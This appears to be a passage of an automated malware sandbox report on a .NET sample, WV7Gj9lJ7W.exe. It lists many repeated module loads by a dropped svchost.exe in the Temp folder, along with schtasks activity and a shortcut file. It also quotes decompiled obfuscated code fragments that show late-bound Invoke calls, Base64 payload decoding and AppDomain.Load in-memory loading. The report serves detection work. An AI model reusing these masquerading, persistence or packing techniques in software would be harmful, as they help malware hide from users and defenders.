                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                  Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\svchost.exe
                                  Source: WV7Gj9lJ7W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: WV7Gj9lJ7W.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains method to dynamically call methods (often used by packers)
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                  .NET source code contains potential unpacker
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs.Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 5_2_00007FFD9B8A00BD pushad ; iretd 5_2_00007FFD9B8A00C1
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 9_2_00007FFD9B8A00BD pushad ; iretd 9_2_00007FFD9B8A00C1
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 11_2_00007FFD9B8900BD pushad ; iretd 11_2_00007FFD9B8900C1
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 12_2_00007FFD9B8A00BD pushad ; iretd 12_2_00007FFD9B8A00C1
                                  Source: WV7Gj9lJ7W.exe, 27nQSNX0HYY6kClZEDjv.csHigh entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
                                  Source: WV7Gj9lJ7W.exe, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
                                  Source: WV7Gj9lJ7W.exe, 316U38w4QVmq2sHFnBvkd4LieyieRq76dn2Kimj2SAfAl.csHigh entropy of concatenated method names: 'hI9KT6csSEYaPv773xBYfKRtTKNVnU7dJn8Qp7EhP9o8D', 'lEZz5agvylve7hksOkLER989WBvtK7k47gcAiIoovQbyf2w8px3wk2BFpD6525UdCuvfpN2sgvMP00OCkrZ7K0hzO3EQqMa', 'qThp3Tnp9uL3mCcx2RKuJOmWtl45lRIvOF9dn1VfKP4GUZGNAE2peaPzu6ACiRMvAZijeLhApv2fylmlEDm0IpwTEDX49yl', '_8Ok5pYSWOD96ESoPqEFtnEDOaH6skpryUVavXewN6tTmHaUVo9u2GANNMKwoYypuNmSwcWOkHXOURN6CNuhWPnjxInE7uF8', '_6YuBy37IC7jwy9VRa0lxGiDaoZtqy93ayCJfcLWCuwbXmNIVfj3VIGIFyG3dOMObHLIc64sjxELzJ2fcJZ0tXMsTSoQ1G4v'
                                  Source: WV7Gj9lJ7W.exe, ake8eTev2BMeufFpdYvXz1rggei7SGsicHjO2bESD2ok5TLhCDsYXlIFx6fvqouj8uy8v8luRiBFk.csHigh entropy of concatenated method names: 'YYHDR1FlBjBxXOU39qSvS1EcsQh0tj8gM35gmXuZITmuiPk08Lm78xWkFCYLoEb3zCUSMok6n8Pz3', 'VDfFRo8LYl1tIXFA06Is3iUDeWnzk1ge8Klc9j3EikbSyEv5jSSlbeFcLIsx826PuEyDRYQKfK5yQ', 'tBSpzoYaZ38vEVkNARodMehzxQe0HGo9Fh3I2', 'c4mbtuvxK9W16V045BYBHgfKZc4cfE26553dq', 'uJ1TmU8R3cr3rAutD0RpanDoSqLqmjn0dnqog', '_3k0jFaralJt9bZKXRcPcjgCnPx3FPWpHraTEk'
                                  Source: WV7Gj9lJ7W.exe, cSNl319mLCwHfhwaDWRYhnKG8D3oxANewMPCBZ2pid1LPBXyU3ptz6Bh9XCQ5pUwwZOVIjaKEPlJe.csHigh entropy of concatenated method names: 'knTr5CJmVp8X9Ko4GZ7ckQNOEhaAynFQXlojQjbSxyl6OhyyDttZrHspfT6xQHm9BOS3diXSEYNSj', 'l66FIfebctAmOjmY7AtDWwoehjmyLESp9Q7ABrsRINsdXHbENH3vJWlYj8DmXd1gwPJS5erC32HOw', 'weMfLXyg4oTWv5b8kh8dYP2K7WshUjVvSn6AK6VNwu8umcIenO7s7tFITnWeBXfd48CZ5M3RLXIAU', 'rkq8Va3BA7apdfvH3rnX9doZlXOicZYXqnyfcDPvBeEls1t7ms86njfHIJOOSwsyr2B4JI4ugQHUY', 'qzBVRY0F1Da1G0Kepxt7anYKc5eHxOc6FffmL', 'TED3M9IaM0EnSj6YZgk3fv5dubsZ9Agoh3plW', 'Yk46pcnFd76Nc6AQvsO7LcEfWflt7KQyxFvcz', 'T66YrvMTGMmZQ8J0zkbd118JJVsitKhmjzGZm', 'VFlaKlbCgpAuH3kfCBnvtwECtfXz7cihAcr9M', 'XicSwzaAyuqo3OkjMsrJSrZFOEiadmmrqpZH1'
                                  Source: WV7Gj9lJ7W.exe, mEMctJ62dLnMaiPT5KFDAPnsIeuT2SibjV9v92SvruauN.csHigh entropy of concatenated method names: 'caZZO7FJB5MgNZYKU7bnFPUmIpW7O3OotbdwueTCPaMDv', 'BWYSgwbdewN1Pj1kRtkXa0yQRt8tLYfQvQwLkKaIJ23ml', 'lMjfsbGxsPuryCxLroIgnXKI3BuA0yywVGKZuU6K5Ym1J', 'mDqu5hS6MIPrQmdl8W5xJabrXw5gkQ8laFVX1pqQCSQPa', 'GyZxcfiQcIFyhJ5KcOw5GVLO1M1os0lW9cAYHiVhklyA1', '_2lLgZlRHpSLWJrC1Q3m0iTtekc14PWgkBoifcONOZOlfG', 'MadPtqRY4CELmJv147dyqfAg2KWeRalVvHXrqAVHChpNr', 'TxyJCy9MVL77OtF6ImM2zYCw2uAHzDOUxvRakni6npGzo', 'JkIzOegnMmo3s68MzID2gqKw3MGQVGKwC8cQqNCMdf6QY', 'iVDPnAhG6ZdGZzb88qVpk6rDBRr76OEqFn4YMW88zmC7B'
                                  Source: WV7Gj9lJ7W.exe, CJam979yUJ3BepXKxOYvRdOc3MuWKQ1MQpVdlrMnmtC8lCvyWDcRTyQ8DvkW.csHigh entropy of concatenated method names: 'LPhiDpGNyupk0QkTJeRDXuAXKk4nZt8S7gmxwZHwaEyqOaCNeE2QcCfLrl2b', 'ZsbMZDmnYIyQzomYcwRhK9DDlwuIy5BYf2rlu7c8uwLhR8R8wO5Zp5QDrg8X', 'q2w1fq2KFMMamsZ6xiMch4B4urGzjjpGxlvQbNDXbBQlzANIStPXANe31EiU', 'teJw5EvhYnucnVqv9E67QSiuB2xkrWyyR8L5kK40GRPwUk3E2703WSSjy60q', 'jo9ARCBqotH12u4jiSrikMJ99HOlIpwcdC5tktu7JtfPeSe9uu7mhAZMPCw9', '_2qkCczNsQvHiRJmqh4e6GA9IKK5YYFT3ttq9XNIhOmBvwiBGS7uoCWPIfX5o', 'shecwU6o120NPfi6qrrKEPcXovd6dSgPxySAbGyB5aMkJqs2JaWT3lfGNAgF', 'QyjxGFi7lmx4DuYz8HRgQFz4PJg7wYXqVzYHiUMED8aolhTTlFzBKRZdUeLq', 'HW08iqc39U4VFyArbSBvUymM4FMSR4RpIRTKd3PlGIQwVbAzPPdo9Y4imupc', 'J7ZlavZodWZZQra3fPoAKEvgOiTjqWW54JG7F1TQUxyDI'
                                  Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csHigh entropy of concatenated method names: 'gsjBXZ37xlu3Pgbwrtg4vL41gtNEaPYaFrlk5KV5K7J7Q', 'rDaGax8TnhfgWhb96TG1vEf0gYpyPGm2OzPfSfrp7JvXr', 'rZk0So3B2qBGNsETvguKChb4BbBP8n7tNslq5LVdLouVN', 'ngkVjhYXgOlHrLuTBFz85U0aIAX1FJjOrvI9E8was4gsn', 'fGxoP2NJQ6e3T8FmZrsKfyD32VUbvvT6hy6TTTlLgmpJS', 'CAEtjMlryCB8plQS4BwkRkfNpvgBqGMCNnA1ALbP7Epil', '_31rX662av2ICwVBfdXsJYMw6U4vpgGIYoxYW2mx9V4fRO', 'MCbZWakKPYzbmlCSIysGx7rnE7Awv6xtyohayUMfQus14', 'd28o9r0Y568Yqc9UaUWgauleK6wX7zqOliWYLh9FosoU8', 'ry5ytayEO67BvgZTs0giQjzjxF1hXl4lGcPO58Ntu6Evv'
                                  Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.csHigh entropy of concatenated method names: 'TqHoBHLeqk1ykJYWtDmzAvlbMZPfwaJUMDRdTqgk7MxFz', 'VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP', 'ajFESKUOmlFLcJlAhY3aiK2rnBPoAmmtL7OCOhOsMSD7w', 'NUXnfVPIauOXEHNj99T919xlIVaZuXns9d1ZYKqWm16lN', 'xwPEpln1nibh4UhRM7kvXTf5vsGRdbjn1IONVe4qcVQHv', 'yXeXianhbNU40Kyrt7w1cPV2K6OeqDjj1JhkgWtLs2Chn', 'SK0pcMI6yma9l8Hp5jHoMZGpCfwbWDANtHuJ2Kh3y0OCt', 'EnwCf6xKrXQ1ZYb5XnSAU7cDURaYrekOdgByfbaG17EtA', '_0r7GaoOFubOWhewAz3YGBaDffErs351I9gCTCL3weWTpX', '_3puQ2eaZ6vEXyDvqKd3gwyJu3z5l3YC4WYsE0djfynr2B'
                                  Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.csHigh entropy of concatenated method names: 'eHJHSZbUFMHuDlsgt06d9ymOkD9rB7winu9BcMTSYaUwUdFYDrVHT4NS1KEc7WdCQcPha83kSWQPx', 'DBwTzVYAj0OlXZD7iKREHEQzm9iVJxP9JaI8y', 't4Pt0laeFIKZ1drk6fylwVxBDN7Bu4Ogj7LW4', 'FC1hCksYTeqI5YEvizv2lkSf36OOnmkj2LfWf', '_6eKKeAz5qdwuHhXipOpE8sbds97HV8zYbRSxv'
                                  Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csHigh entropy of concatenated method names: 'ds3aGKgg1oiG6NqZOeTJuOlHCWHkAGVFdvjQ0EswmB29Hkw1fNzaZnSwyXR29uHtmN1QIvEEvh9iB', 'eDbv3OxSnYNivcZ1H9KT8kLfKwPXn63H7kLnJnJ44HijwhwmIWhGxbHUe239z9rIEnXHHcfAGTtpo', 'ZoVtxeSHR42WIpJCL1sglvgjf3AMH73YZx9UWpY3XorYNiRo7KW4STDzjA6yBQVCKGx3JIuXgf2QH', 'zUOykfwxJ07CoUYchVWmMqUhoDCv5Ik62ZQR4BRwOVBgRgsmUq5MwhV2mSFPB9UqBTzQ8pPq2eEvd', 'DKpA8fcq9OZEWLyqzR1G4J0CWUNEmAAwPt44eWHPalrTwxeolZ9mpJM6NXwntFas9mrWNlKkLsC7t', 'zb9c9G1YiJKqRtvBdtHeclNxmKjZCYJOE4b9obVuWLFduTy8GwB2QiRVOgCMpAS3AiPbM6XaMDoRz', 'jvm8pxvCwJVxGBwQ20W0GUv6mmWGpGau9qeUi8dsyqCBMiGsXWC9cxmX2bx5t3Akeln1A5AiRg83E', '_5tvOB8IKfSaR8yUijr3gsJ0ALECffPvW29mvpobrc5s1IvX9lr94I4oQ6Sme4pyTeJSigZjW4YJCS', 'YJzGPkrabKVcrFBkGIyFk25PMRE9BUZKYdRswpPLuQ3XGz4ZgzFkJ1z342K6DjFKYCo8j06v7LZlf', 'EihXhbaK7HgJ5FqKQdiV7I5LEpvOMIjISpUqMghjafuXOCuKRVaO7MgyeiM3d5qGagL9NXXQhHBkR'
                                  Source: WV7Gj9lJ7W.exe, C4gGYUvWN18G9l2hocBF2CWYzbPPKT1kTmJi83nHjcK6eRA10zBaeiiN3XvONpq260iicDMmpvue1.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_4AwoLb8w8tjx5jKViAlbKypkkKXIuHLucONq8Z6hZ6fCh6mfSOX4WOufslFXQxyQkWyiWBZVFaFuA', 'uQUdpik0SrcOqNytG3RkVvn9VDtGdnnbsLcHY', 'KnwawU5cr7z9TvPKtF2xxO4DecOSX70nXOvZa', '_9VKDxMdtfmJSWPqZ0R42jXCg5Vo9NAqfCabzh', 'yFcSURPynt5k8LnL2H4XQya3yflF7DxrmXVgN'
                                  Source: svchost.exe.0.dr, 27nQSNX0HYY6kClZEDjv.csHigh entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
                                  Source: svchost.exe.0.dr, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
